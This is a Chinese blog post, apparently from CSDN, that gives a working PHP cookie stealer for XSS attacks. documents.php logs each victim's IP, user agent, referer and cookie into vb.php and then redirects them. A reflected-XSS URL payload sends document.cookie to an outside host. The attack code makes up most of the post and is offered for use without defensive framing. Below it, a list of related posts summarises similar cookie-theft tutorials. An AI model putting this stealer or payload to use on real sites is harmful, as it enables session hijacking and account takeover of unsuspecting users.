利用XSS窃取cookie的php脚本

最新推荐文章于 2023-07-27 15:32:13 发布
最新推荐文章于 2023-07-27 15:32:13 发布
阅读量1.8k 收藏 1
点赞数 1
分类专栏: PHP

1.支持PHP 网页

2.网站存在xss的脆弱的地方。
 vb.php为存放cookie的网页 
<head>
<meta http-equiv=”Content-Language” content=”it”>
<title>Cookies Stealther – Designed and programmed by R00t[ATI]</title>
</head>
<body bgcolor=”#C0C0C0″>
<p align=”center”><font color=”#FF0000″>COOKIES STEALTHER</font></p>
<p align=”center”><font face=”Arial” color=”#FF0000″>By R00T[ATI]</font></p>
<p align=”left”> </p>
</body>

documents.php取得cookie的网页 
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET[c];
$time = date(“Y-m-d G:i:s A”);
$text = “<br><br>”.$time.” = “.$ip.”<br><br>User Agent: “.$agent.”<br>Referer:    “.$referer.”<br>Session: “.$data.”<br><br><br>”;
$file = fopen(‘vb.php’ , ‘a’);
fwrite($file,$text);
fclose($file);
header(“Location: http://ashker.Net”);
?>

Vb.php文件是用来收集Cookie和其他信息。
documents.php文件用于抓取资料如: IP地址,用户代理和cookie 。
documents.php是抓住文件的Cookie使用的方法
documents.php?c=”+document.cookie;

Code:
http://www.ashker.Net/vulnerable_page.php?vulnerable_method=<script>document.location=”http://ashker.net/documents.php?c=”+document.cookie;</script>
dakang
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS窃取cookiephp脚本
weixin_33897722的博客
09-14 248
1.支持PHP 网页 2.网站存在xss的脆弱的地方。 vb.php为存放cookie的网页 PHP Code: <head> <meta http-equiv=”Content-Language” content=”it”> <title>Cookies Stealther – Designed and p...
利用XSS盗取cookies
weixin_34235371的博客
02-25 130
利用XSS盗取cookies 1.把下里代码保存为cookies.asp,然后上传到能被正常访问的空间 <% testfile=Server.MapPath("cookies.txt") msg=Request("cookies") set fs=server.Cre...
XSS入侵服务器盗取用户cookie
hughwupan的博客
03-28 1604
XSS入侵服务器盗取用户cookie欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导...
漏洞复现篇——利用XSS漏洞获取cookie
爱国小白帽
02-20 3022
实验环境: PHPstudy 火狐浏览器、IE DVWA靶场
php盗取cookies,盗取cookies的代码(asp,php,perl)_PHP教程
weixin_39525865的博客
03-16 82
ASP版dim strfilenamestrfilename = "mydata.txt" 数据文件存放目录set lP=server.createObject("Adodb.Stream")lP.OpenlP.Type=2lP.CharSet="gb2312"lP.writetext request.Servervariables("QUERY_STRING")lP.SaveToFile ser...
cookie-stealer:简单PHP-Javascript-XSS的Web服务器Cookie窃取脚本
05-09
【标题】:“cookie-stealer:简单PHP-Javascript-XSS的Web服务器Cookie窃取脚本”描述了一种利用跨站脚本XSS)漏洞来窃取用户Web服务器Cookie的恶意技术。Cookie是网站用于存储用户状态和信息的一种机制,如登录...
xss防御之php利用httponly防xss攻击
12-19
这样就减少了攻击者利用XSS窃取用户身份信息、管理员凭证等敏感数据的风险。 在PHP中,有多种方式可以设置HTTPOnly Cookie: 1. **全局开启**:在`php.ini`配置文件中,可以设置`session.cookie_httponly = 1`来...
JS写XSS cookie stealer来窃取密码的步骤详解
10-18
JavaScript是web中最常用的脚本开发语言,js可以自动执行站点组件,管理站点内容,在web业内实现其他有用的函数。这篇文章主要介绍了JS写XSS cookie stealer来窃取密码的步骤详解,需要的朋友可以参考下
XSS跨站脚本攻击课件
最新发布
11-24
XSS(Cross-Site Scripting)跨站脚本攻击是网络攻防领域中的常见威胁,攻击者利用这种技术向网页中注入恶意脚本,进而对用户的信息安全构成严重风险。由于浏览器通常无法区分合法与恶意脚本,因此在未采取适当防护...
xss跨站脚本攻击与预防
11-04
1. **窃取cookie**:攻击者可以通过XSS获取用户的session或cookie,进而冒充用户身份。 2. **钓鱼欺诈**:构造虚假页面,诱导用户进行敏感操作,如输入账号密码。 3. **传播恶意软件**:在受害者的浏览器上执行恶意...
bWAPP中利用反射型xss获取cookie
****的博客
09-10 533
实验环境介绍 靶机:bWAPP bug类型:XSS - Reflected (GET) 难度级别:low 过程: 注:部分浏览器默认开启了XSS防御,关闭后才能实验成功。 测试靶机(图中的web server)是否存在XSS攻击。 URL地址:“http://192.168.248.174/dvwa/bWAPP/xss_get.php” 输入js代码 <script>alert(1...
反射型xss钓鱼盗取用户cookie
m0_53820621的博客
01-16 4451
演示用靶场:dvwa
渗透测试-跨站脚本攻击xss之获取cookie
lza20001103的博客
04-24 4848
渗透测试-跨站脚本攻击xss之获取cookie
简单的利用XSS获取用户cookie
shy的博客
10-25 4293
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
xss获取cookie登陆
weixin_51356351的博客
11-17 1040
实验环境: phpstudy DVWA靶场 实验步骤 1、在phpstudy的www目录下创建一个名为1.php的文件,文件内容如下: <?php $file = fopen("1.txt","a"); if($_GET['cookie']){ $cookie = $_GET['cookie']; fputs ($file,"$cookie\n"); } ?> 2、进入DVWA靶机,级别调成low,选择(XSS)stored 3、F12打开查看器,将值改的大一点 4、将插入留言板中
网络安全学习笔记——盗取Cookies跨站脚本XSS
just do it
07-24 1393
使用替换过了的URL发给目标,诱导目标点击,然后目标的cookies就会回弹到XSS攻击平台上,展开就可以看到该目标的PHPSESSID,然后在自己的同源网站上,笔记本按Fn+F12,调出Hackerbar,点击存储,然后把PHPSESSID换成攻击之后得到的,删掉浏览框里面多余的东西,剩下XXX.php即可,刷新之后就会登录该目标的账号——,SESSID——中间键,是Apache分配的,唯一的“身份证”,从SESSID入手,就可以查取用户的相关信息。
利用XSS窃取用户Cookie
Monsterlz123的博客
07-20 7113
XSS利用XSS窃取用户Cookie Hello,各位小伙伴周六愉快。 晃眼之间一周又快要过去了,时间是不等人滴~~ 这周准备连发三篇XSS相关内容,两篇实战,一篇总结。 然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。 一、实验概述 实验拓扑: XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网站中插入恶意脚本,一旦用户访问该网页...
使用xss钓鱼盗取用户cookie
m0_74805513的博客
07-27 998
那么可以看到第一步写入成功了,将cookie写入了我们事先建立好的网站,并且保存了下来,我们在点开gtck.html 去更加细致的查看里面是否有我们保存的cookie。这行代码也很简单,就是加载后转到我们搭建的web网页,向我们的网页传入用户的cookie,document.location='url'起到页面加载后转到。很简单的一个网页主要用来接收用户cookie,然后写入gtck.html文件里,然后我们在创建gtck.html文件,用来保存用户cookie
存储型xss dvwa窃取cookie
06-06
存储型XSS攻击是一种利用网站漏洞,将恶意脚本存储在服务器上,当其他用户访问该网站时,恶意脚本会被执行,从而实现攻击者的目的。在DVWA中,攻击者可以通过在留言板或评论区等存储用户输入的地方,插入恶意脚本,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值